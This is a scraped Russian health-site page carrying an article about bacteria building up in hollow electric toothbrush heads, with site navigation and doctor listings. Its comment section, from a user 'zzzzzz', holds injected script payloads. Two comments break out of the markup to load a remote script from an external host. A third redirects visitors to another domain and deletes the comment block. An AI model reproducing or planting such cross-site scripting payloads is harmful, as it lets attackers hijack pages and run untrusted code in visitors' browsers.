Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Производители зубных щето...  >>  Производители зубных щеток не хотят, чтобы вы это знали!
 
Обратная связь
 

Производители зубных щеток не хотят, чтобы вы это знали!

Размер шрифта
08 апреля 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Оказывается, не все электрические зубные щетки одинаково безопасны. Ученые выяснили, что в щетках с полыми головками накапливаются бактерии, которые могут навредить здоровью ваших зубов.

«На зубных щетках могут скапливаться микроорганизмы, которые вызывают различные заболевания. Однако на щетках с цельными головками таких бактерий гораздо меньше», – рассказывает Донна Уоррен Морис, профессор стоматологии в Университете Техаса и ведущий автор исследования. «При выборе щетки нужно обращать внимание на щетинки – они должны быть достаточно мягкими и быть сделаны из нейлона. Очень важно дезинфицировать щетку и давать ей полностью высохнуть в перерывах между использованиями. В некоторых современных электрических щетках есть система очистки ультрафиолетом, однако вы можете легко провести дезинфекцию и без нее, достаточно опустить головку щетки в средство для полоскания рта на 20 минут».

Эксперимент профессора Морис длился три недели, в течение которых все участники чистили зубы два раза в день щеткой, которая была выбрана для них случайным образом из трех опытных образцов. Участники могли пользоваться зубной пастой и зубной нитью, однако другие средства для очищения, такие как ополаскиватель для полости рта, использовать было запрещено. Всего в головках щеток было обнаружено несколько типов бактерий – стрептококки, энтерококки, а также порфиромонады и фузобактерии. Причем на щетках с цельными головками бактерий было значительно меньше, чем на щетках с полостью в головке.

До сих пор не было опубликовано исследований, подтверждающих, что скопления бактерий на зубных щетках могут серьезно повлиять на здоровье человека, однако Моррис отметила, что некоторые из этих микроорганизмов способны влиять на развитие системных заболеваний. «К примеру, была выявлена связь между фузобактериями и раком толстой кишки. Еще один вид бактерий может влиять на развитие заболеваний сердца», – объясняет Моррис. «Нам давно известна связь между заболеваниями десен и болезнями сердца – их могут вызывать одни и те же микроогранизмы».

Чтобы избежать роста бактерий у вас в ванной комнате, внимательно подходите к выбору зубной щетки. И помните, любая зубная щетка нуждается в периодической дезинфекции.

Результаты этого исследования, проведенного в Университете Техаса в Хьюстоне, были опубликованы в Journal of Dental Hygiene.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 21:20

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:15

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Выбираем зубную щетку   Выпали зубы – у вас болезнь сердца!   Красивая улыбка – лучший новогодний подарок!   15 способов повредить зубы  
23 апреля 2013Выпали зубы – у вас болезнь сердца! 07 февраля 2012Оптимизм и чувство юмора помогает победить страх перед стоматологом
 
14 ноября 2011Чистка зубов предохраняет от сердечных болезней 14 января 2011Как победить страх перед стоматологом
 

Слайдшоу

1
Как из Бабы-яги превратиться в красавицу
Еда, которая красит зубы
Чувствительные зубы

Тесты

Оцените здоровье ваших зубов
Как правильно чистить зубы
Уход за полостью рта
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.